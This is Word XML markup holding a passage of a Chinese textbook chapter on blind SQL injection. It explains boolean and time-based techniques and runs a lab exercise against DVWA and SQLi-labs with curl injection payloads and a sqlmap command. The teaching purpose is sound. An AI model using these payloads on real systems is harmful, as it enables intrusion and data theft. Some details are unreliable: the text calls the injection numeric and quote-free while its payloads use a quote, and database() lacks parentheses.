      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符的数据库名约需</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 70 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次请求；若进一步提取表名、列名与数据行，总请求量可达数百至数千。对于时间盲注，每次请求可能额外增加数秒延迟，整体攻击时间将大幅膨胀。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="168"/>
    <w:bookmarkStart w:id="169" w:name="时间盲注延迟作为信息信道"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间盲注：延迟作为信息信道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当页面内容差异被完全抹平（统一错误页或没有任何用户可见输出改变），布尔盲注无法区分真假，但延迟依然可控。攻击者通过嵌入条件触发的延时函数实现信道。以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1' AND IF(ASCII(SUBSTRING((SELECT database),1,1))=X, SLEEP(5), 0) --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若猜测正确，服务器将在执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP(5)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后响应，客户端可观测到约</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒以上的延迟；否则几乎立即返回。对应其他数据库的函数如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、SQL Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WAITFOR DELAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。攻击者需要为每个字符的每个猜测发送请求并测量延迟，利用脚本或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具自动化是该技术的常态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间盲注受网络抖动影响较大。攻击者通常需设定一个基线阈值，例如多次正常响应的平均时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">倍标准差，超过阈值才判定为“真”。某些防御措施如查询超时或禁用延时函数可能会切断该信道（见防御对照框）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="169"/>
    <w:bookmarkStart w:id="170" w:name="交叉回指从手工到自动化"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交叉回指：从手工到自动化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手工执行布尔/时间盲注极其繁琐，因此实战中常借助自动化工具。sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique=B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅布尔）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique=T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅时间）可高效利用这些盲注点，并自动处理编码、二分搜索和并发优化。Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Intruder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块也可用于半自动化地暴力猜解字符，但效率远低于专用工具。前文第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章已涵盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截与改包，此处可直接用于拦截含盲注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的请求并观察响应长度与时间。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="170"/>
    <w:bookmarkStart w:id="171" w:name="靶机实操单元-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机与搭建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA (v1.10+, Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全级别)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：导航至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“SQL Injection (Blind)”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块。当安全级别调至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，输入不再是简单的数字</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，可能为下拉选择，需通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改包进行注入。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi-labs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Less-5/6（Double</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类）属于有错误回显但无数据回显的“错误盲注”，本节更适用的典型盲注关卡为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Less-8（Boolean-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">blind）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Less-9（Time-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">blind），这些关卡的源码一律不输出任何数据库内容，仅凭页面差异或延迟判断。请确认靶机已按第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章指南部署，IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐步命令与操作要点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下演示假设目标为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi-labs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Less-8（布尔盲注），注入点为数字型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，无需引号闭合。所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_URL&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用实际靶机地址替换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1093"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">探测布尔盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;TARGET_URL&gt;/Less-8/?id=1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;TARGET_URL&gt;/Less-8/?id=1' AND 1=1 --+"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 页面正常或无任何输出变化</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;TARGET_URL&gt;/Less-8/?id=1' AND 1=2 --+"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 页面变空或提示不存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若后者返回内容与前者不同（如页面出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“You are in”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与空白页的差异），则证实布尔盲注存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据库名长度判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（假设已知注入点为数值型，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注释末尾）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;TARGET_URL&gt;/Less-8/?id=1' AND (LENGTH(database))=1 --+"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;TARGET_URL&gt;/Less-8/?id=1' AND (LENGTH(database))=2 --+"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ...递增直到页面从真变假</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录长度值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐字符提取库名（手工二分）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以位置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例，下界</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> low=0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">high=128；每次猜测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mid=(low+high)//2：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;TARGET_URL&gt;/Less-8/?id=1' AND ASCII(SUBSTRING(database,1,1)) &gt; &lt;mid&gt; --+"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若页面为真（仍在正确页面），则设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">low=mid+1，否则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">high=mid。循环逼近直至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">low=high，即得该字符的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASCII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">码。对所有位置重复操作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[简化]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自动化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;TARGET_URL&gt;/Less-8/?id=1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--threads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数说明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique=B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅使用布尔盲注；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
